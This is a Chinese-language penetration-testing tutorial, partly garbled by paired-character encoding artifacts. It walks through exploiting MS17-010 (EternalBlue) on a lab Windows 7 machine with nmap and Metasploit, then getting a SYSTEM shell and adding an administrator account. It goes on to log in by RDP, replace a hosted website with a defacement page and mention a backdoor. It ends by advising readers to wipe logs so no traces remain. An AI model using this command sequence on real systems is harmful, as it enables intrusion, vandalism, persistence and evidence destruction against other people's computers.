本教程僅用于交流學(xué)習(xí)，請遵守網(wǎng)絡(luò)安全相關(guān)法律法規(guī)，如果利用本技術(shù)進(jìn)行互聯(lián)網(wǎng)犯罪，本人概不負(fù)責(zé)。

前幾篇投稿我們基于web層面，講解了SQL注入的一些方法。今天這篇教程，我們則通過漏洞，對靶機進(jìn)行入侵。

實驗環(huán)境：

攻擊機：kali linux

靶機：windows7 professional?

首先，我們得知了這個機器的ip地址（在靶機cmd輸入ipconfig），那么，我們可以先進(jìn)行一定的信息收集。

我們要知道靶機開啟了什么端口，每個端口運行了什么服務(wù)，每個服務(wù)的版本號，靶機存在的漏洞等等信息。所以，我們可以先跑一遍nmap,收集端口，漏洞等信息。

我們輸入nmap -v 靶機ip后，看到了如下結(jié)果，我們看到了靶機開放了很多的端口，或許會為我們的滲透測試提供一定的幫助。

至于我為什么沒有進(jìn)行OS Scan,我的靶機運行在虛擬機中，無法測出準(zhǔn)確的系統(tǒng)os，僅能測試出靶機運行在虛擬機中。

nmap掃描其實是一個很強大的掃描工具，我們可以使用nmap對靶機進(jìn)行常見漏洞的掃描。

我們輸入：

nmap -v 靶機ip --script=vuln

我們探測出了這些漏洞，靶機可能存在sql注入，存在slowloris ddos attack漏洞，不過，有一個漏洞吸引了我，那就是我們今天的主角：ms17-010（永恒之藍(lán)）

永恒之藍(lán)漏洞在百度上的介紹很多，在這里就不進(jìn)行綴述了，感興趣可以去百度查詢一下。

我們既然拿到了漏洞，我們就嘗試?yán)寐┒磳Π袡C進(jìn)行攻擊。

漏洞利用工具：msfconsole

我們在命令欄輸入msfconsole

這就是msfconsole工具，這里集成了很多漏洞利用模塊，我們查找一下永恒之藍(lán)的漏洞利用模塊。

輸入search ms17-010

我們看到了如下模塊，其中，exploit為攻擊模塊，auxiliary為探測模塊，我們可以利用攻擊模塊進(jìn)行攻擊。

我們輸入use exploit/windows/smb/ms17_010_eternalblue

這樣我們就設(shè)置好了攻擊模塊，下一步我們可以設(shè)置一下payload攻擊載荷。

我們輸入show payloads

我們看到這個模塊有很多的攻擊載荷，我們可以多進(jìn)行嘗試，換不同的payload進(jìn)行攻擊

我們設(shè)置好攻擊載荷，接下來我們可以看看這個模塊要設(shè)置什么參數(shù)

輸入命令show options

這樣顯示出了我們需要填寫的參數(shù)，不過，在這里，實際需要填寫的參數(shù)只有RHOST

這里，RHOST為靶機的ip地址。

我們輸入命令

set RHOST 靶機ip

這樣我們的攻擊目標(biāo)就設(shè)置好了，接下來我們就要發(fā)動攻擊了。

輸入命令exploit

到這里攻擊成功了，不過我們的攻擊還沒有結(jié)束，我們來看一下靶機當(dāng)前狀態(tài)。

目前靶機是什么提示都沒有的，也不知道已經(jīng)遭受了攻擊。

我們接下來查看一下我們當(dāng)前的權(quán)限，查看是否需要提權(quán)。

輸入命令

getuid

我們看到我們當(dāng)前的權(quán)限為system權(quán)限，那么我們就無需進(jìn)行提權(quán)了，我們嘗試一下拿靶機的shell

輸入命令

shell

嗯看起來已經(jīng)成功拿到shell了，那么，我們接下來就要做點壞事了。我們通過最開始的信息收集階段，看到靶機的3389端口是開放的，那么我們可以嘗試遠(yuǎn)程登陸（當(dāng)然沒開也沒關(guān)系，我們可以通過shell進(jìn)行開啟）

那么既然可以遠(yuǎn)程登錄，我們就要用到賬號密碼進(jìn)行登錄，最簡單的方法就是創(chuàng)建一個用戶，然后把這個用戶加入到管理員組。

那么這里就要用到一些windows基礎(chǔ)cmd命令的知識了。

我們輸入

net user hacker a1353008533aA /add

接下來檢查一下是否添加成功

輸入命令

net user

嗯看起來添加成功了，然后我們要把這個用戶添加到管理員組。

輸入命令

net? localgroup Administrators hacker /add

我們嘗試用遠(yuǎn)程桌面連接來連接靶機，用我們創(chuàng)建的用戶。

嗯，看起來成功了。

接下來干點什么呢，掛個黑頁吧，剛剛好之前編寫了一個黑頁。

我們既然攻擊成功了，那么上傳文件我們也能夠做到，我們輸入命令

upload 文件 上傳地址

這里，我是把我的黑頁上傳到了本地磁盤C根目錄下，我們看看是否上傳成功。

很好，找到黑頁了，我們這臺靶機運行了一個phpstudy,并在上面正在運行一個網(wǎng)站，那么，我直接把原來的網(wǎng)站刪掉，然后把我的黑頁掛上去。然后我們訪問一下網(wǎng)站看看。

很好，這樣黑頁就掛上去了，無論任何人訪問這個網(wǎng)站都會顯示我們的黑頁。

最后，我們可以留一個后門，以便于我們?nèi)魏螘r候都可以連接到這個靶機。這里就不詳細(xì)演示了。

當(dāng)然，你也可以做一些你想做的事，不過，離開前，記得清理一下日志，不要留下什么線索。

本篇教程到這里就結(jié)束了，接下來，我會出一些關(guān)于其他漏洞復(fù)現(xiàn)以及網(wǎng)絡(luò)安全知識的相關(guān)教程。如果發(fā)現(xiàn)本篇教程出現(xiàn)什么錯誤，請指出來。